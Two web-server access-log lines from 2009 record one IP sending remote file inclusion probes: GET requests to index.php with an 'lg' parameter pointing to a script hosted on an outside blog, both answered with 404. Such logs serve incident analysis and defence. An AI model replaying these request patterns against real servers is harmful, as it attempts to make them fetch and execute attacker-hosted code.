59.22.140.17 - - [16/Jul/2009:04:10:53 -0400] "GET /logs/access_log.Q109051100/index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.22.140.17 - - [16/Jul/2009:04:10:53 -0400] "GET /logs/index.php?lg=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
